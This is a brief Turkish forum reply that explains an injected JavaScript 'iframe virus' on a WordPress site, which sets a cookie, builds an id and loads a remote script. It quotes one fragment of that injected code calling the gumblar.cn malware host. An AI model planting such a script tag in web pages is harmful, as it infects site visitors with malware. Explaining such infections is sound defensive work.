ben wordpress yazılımcısı değilim anlayamam ama bu js scripti aslında içindeki kodlarla iframe gibi kapı açıyor.
yani: iframe virüsü

tarayıcına göre cookie işliyor id üretiyor ürettiği id ile seni aşağıdaki adrese yolluyor
script src=//gumblar.cn/rss/?id="+j+"><\/script>");}
birüs ise bu adresin içinde. doğal olarak senin site üzerinden virüsünü yayıyor
tabi daha detaylısnı wordpressçi arkadaşlar anlatır benden buraya kadar
kolay gelsin